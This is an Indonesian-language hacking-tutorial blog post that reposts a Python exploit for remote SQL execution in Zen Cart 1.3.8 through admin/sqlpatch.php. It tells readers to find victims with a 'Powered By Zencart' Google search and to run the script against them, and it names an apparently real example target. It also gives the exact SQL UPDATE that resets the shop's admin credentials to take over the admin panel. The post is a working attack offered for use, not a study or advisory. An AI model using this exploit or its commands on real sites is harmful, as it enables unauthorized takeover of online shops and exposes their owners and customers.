Home > Hacking Tools , Hacking Tutorial , Security > Tutorial Zen Cart 1.3.8 Remote SQL Execution

Tutorial Zen Cart 1.3.8 Remote SQL Execution


 Andrian21 - PertamaTama , Buka Google Dan Ketikan "Powered By Zencart"


pilih salah satu site untuk di jadikan victim, kemudian save dulu source python di bawah ini :

 #
   # ------- Zen Cart 1.3.8 Remote SQL Execution
   # http://www.zen-cart.com/
   # Zen Cart Ecommerce - putting the dream of server rooting within reach  of anyone!
   # A new version (1.3.8a) is avaible on http://www.zen-cart.com/
   #
   # BlackH :)
   #
   #
   # Notes: must have admin/sqlpatch.php enabled
   #
   # clean the database :
   #    DELETE FROM `record_company_info` WHERE `record_company_id` =  (SELECT `record_company_id` FROM `record_company` WHERE  `record_company_image` = '8d317.php' LIMIT 1);
   #    DELETE FROM `record_company` WHERE `record_company_image` =  '8d317.php';
   
   import urllib, urllib2, re, sys
   
   a,b = sys.argv,0
   
   def option(name, need = 0):
   global a, b
   for param in sys.argv:
   if(param == '-'+name): return str(sys.argv[b+1])
   b = b + 1
   if(need):
   print '\n#error', "-"+name, 'parameter required'
   exit(1)
   
   if (len(sys.argv) < 2):
   print """
   =____________ Zen Cart 1.3.8 Remote SQL Execution Exploit  ____________=
   ========================================================================
   |                  BlackH                            |
   ========================================================================
   |                                                                       |
   | $system> python """+sys.argv[0]+""" -url                         |
   | Param:       ex: http://victim.com/site (no  slash)              |
   |                                                                       |
   | Note: blind "injection"                                               |
   ========================================================================
   """
   exit(1)
   
   url, trick = option('url', 1), "/password_forgotten.php"
   
   while True:
   cmd = raw_input('sql@jah$ ')
   if (cmd == "exit"): exit(1)
   req =  urllib2.Request(url+"/admin/sqlpatch.php"+trick+"?action=execute",  urllib.urlencode({'query_string' : cmd}))
   if (re.findall('1 statements  processed',urllib2.urlopen(req).read())):
   print '>> success (', cmd, ")"
   else:
   print '>> failed, be sure to end with ; (', cmd, ")"
 save source di atas dengan extensi .py misal zen.py
sebelum nya komputer kamu instal dlu pithon nya ,
kalo blum aja download aja di : http://www.python.org/ftp/python/2.5/python-2.5.msi

kemudian buka terminal (CMD), misal zen.py
kamu taruh di desktop bearti cmd di arahin ke desktop dlu

kalo udah ketik : zen.py -url htttp://webkorban.com

contohh : zen.py -url http://customizthat.com/2010/admin/ <-enter
trus nanti ada tulisan $sql@jah
jika ada tulisan itu
bearti masukin
perintah : UPDATE admin SET admin_name='adminz', admin_email='admin@shopadmin.com', admin_pass='617ec22fbb8f201c366e9848c0eb6925:87' WHERE admin_id='1'; trus enter

kalo berhasil maka akan muncul kayak ini : >> success ( UPDATE admin SET admin_name='adminz', admin_email='admin@shopadmin.
com', admin_pass='617ec22fbb8f201c366e9848c0eb6925:87' WHERE admin_id='1'; )
sql@jah$

kalo sudah succes, tinggal di url target ditambahin /admin/
kalo succes setiap username sama pasword nya itu adminz , Semoga Sukses
Ranking: 5
 
© Andrian21 All Rights Reserved